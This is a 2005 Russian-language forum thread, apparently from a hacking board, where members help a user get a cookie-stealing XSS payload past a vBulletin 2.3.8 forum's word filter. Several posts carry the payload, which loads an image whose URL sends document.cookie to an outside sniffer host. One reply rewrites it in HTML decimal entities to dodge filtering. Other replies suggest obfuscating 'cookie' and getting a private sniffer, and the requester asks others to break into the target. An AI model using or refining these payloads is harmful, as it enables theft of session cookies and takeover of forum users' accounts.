Проблема с XSS в vBulletin 2.x.x. Просьба помочь.

Discussion in 'Песочница' started by ProblemaT, 16 Dec 2005.

Thread Status:
Not open for further replies.
  1. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Такое дело прописываю эту xss(изложено в этой теме /showthread.php?t=5469) в форуме vBulletin версии 2.3.8 а она заменяется на такую вот хню aaa@aaa.aa"'s='' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));, появляются эти звёздочки. Кто нить может мне помочь, может её можно как нить запрятать.
     
    #1 ProblemaT, 16 Dec 2005
    Last edited: 16 Dec 2005
  2. Thesaurus

    Thesaurus Banned

    Joined:
    3 Dec 2005
    Messages:
    11
    Likes Received:
    19
    Reputations:
    10
    Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

    http://ha.ckers.org/xss.html

    А вообще исходный код страницы дай.. :rolleyes:
     
    #2 Thesaurus, 16 Dec 2005
  3. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Тыпрочитай тему которую я указал выше.
     
    #3 ProblemaT, 16 Dec 2005
  4. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    #4 ProblemaT, 16 Dec 2005
  5. Thesaurus

    Thesaurus Banned

    Joined:
    3 Dec 2005
    Messages:
    11
    Likes Received:
    19
    Reputations:
    10
    тут... :rolleyes:
     
    #5 Thesaurus, 16 Dec 2005
  6. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    <p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));</font></p>
     
    #6 ProblemaT, 16 Dec 2005
  7. Thesaurus

    Thesaurus Banned

    Joined:
    3 Dec 2005
    Messages:
    11
    Likes Received:
    19
    Reputations:
    10
    HTML:
    <p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='&#105&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#116&#104&#105&#115&#46&#115&#115&#115&#61&#110&#117&#108&#108" style=&#116&#111&#112&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#101&#118&#97&#108&#40&#116&#104&#105&#115&#46&#115&#115&#115&#41&#41&#59</font></p>

    http://ha.ckers.org/xss.html

    Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:
     
    #7 Thesaurus, 16 Dec 2005
  8. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    А какой брать код HTML (with semicolons) или HTML (without semicolons)?
     
    #8 ProblemaT, 16 Dec 2005
  9. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Не выходит, пишет как простой текст.
     
    #9 ProblemaT, 16 Dec 2005
  10. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
    Секешь к чему я?
    если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут
     
    #10 k1b0rg, 16 Dec 2005
  11. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    а как быть с cookie, тоже заменяет на звёздочки . ****ie
     
    #11 ProblemaT, 16 Dec 2005
  12. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    а cookie надо кодировать, вставлять табуляуцию, эксперементировать с /
     
    #12 k1b0rg, 16 Dec 2005
  13. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Братишка я мало в это понимаю не мог бы мне помочь, попробуй ломани их ...
     
    #13 ProblemaT, 16 Dec 2005
  14. ProblemaT

    ProblemaT New Member

    Joined:
    16 Dec 2005
    Messages:
    42
    Likes Received:
    1
    Reputations:
    0
    Спасибо всем... Я разобрался....
     
    #14 ProblemaT, 17 Dec 2005
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.